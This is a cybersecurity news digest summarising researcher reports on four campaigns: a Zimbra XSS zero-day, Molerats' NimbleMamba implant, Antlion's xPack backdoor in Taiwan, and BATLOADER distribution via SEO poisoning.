At a glance.
- Zero-day flaw in Zimbra exploited by suspected Chinese threat actor.
- New Molerats campaign.
- Antlion targets financial entities in Taiwan.
- Cybercriminals use SEO poisoning.
Zero-day flaw in Zimbra exploited by suspected Chinese threat actor.
Researchers at Volexity are tracking a cyberespionage campaign being run by a suspected Chinese threat actor. The threat actor exploited a zero-day cross-site scripting vulnerability in the Zimbra email platform:
"The campaigns came in multiple waves across two attack phases. The initial phase was aimed at reconnaissance and involved emails designed to simply track if a target received and opened the messages. The second phase came in several waves that contained email messages luring targets to click a malicious attacker-crafted link. For the attack to be successful, the target would have to visit the attacker's link while logged into the Zimbra webmail client from a web browser. The link itself, however, could be launched from an application to include a thick client, such as Thunderbird or Outlook. Successful exploitation results in the attacker being able to run arbitrary JavaScript in the context of the user's Zimbra session. Volexity observed the attacker attempting to load JavaScript to steal user mail data and attachments."
Zimbra issued a hotfix for the flaw on Saturday.
New Molerats campaign.
Proofpoint has observed a new campaign by the Palestinian-aligned threat actor known as the Molerats. The threat actor is using a new malware implant dubbed "NimbleMamba":
"In late 2021, Proofpoint analysts identified a complex attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline. Over three months, Proofpoint observed three subtle variations of this attack chain. Proofpoint attributes these campaigns to TA402, an actor commonly tracked as Molerats and believed to be operating in the interest of the Palestinian Territories. Based on Proofpoint’s research, TA402 is a persistent threat to organizations and governments in the Middle East, routinely updating not only their malware implants, but also their delivery methods. After publication of Proofpoint’s TA402 research in June 2021, TA402 appeared to halt its activities for a short period of time, almost certainly to retool. Proofpoint researchers believe they used that time to update their implants and delivery mechanisms, using malware dubbed NimbleMamba and BrittleBush. TA402 also regularly uses geofencing techniques and varied attack chains which complicate detection efforts for defenders."
Antlion targets financial entities in Taiwan.
Symantec researchers describe an espionage campaign by a Chinese APT dubbed "Antlion" that's active against Taiwanese financial institutions. The threat actor is using a new backdoor called "xPack":
"The main custom backdoor used by Antlion in this campaign was the xPack backdoor, which is a custom .NET loader that decrypts (AES), loads, and executes accompanying .bin files. Its decryption password is provided as a command-line argument (Base64 encoded string), and xPack is intended to be run as a standalone application or as a service (xPackSvc variant). The xPack malware and its associated payload seems to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders."
The researchers note that the threat actor spent a "significant amount of time" within the compromised networks, lurking within one organization's network for nearly 250 days.
Cybercriminals use SEO poisoning.
Mandiant says a threat actor is using SEO poisoning to distribute the BATLOADER and ATERA malware. The researchers don't attribute the campaign to any known group, but they suspect this activity is a precursor to ransomware attacks:
"The threat actor used 'free productivity apps installation' or 'free software development tools installation' themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.
"This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection."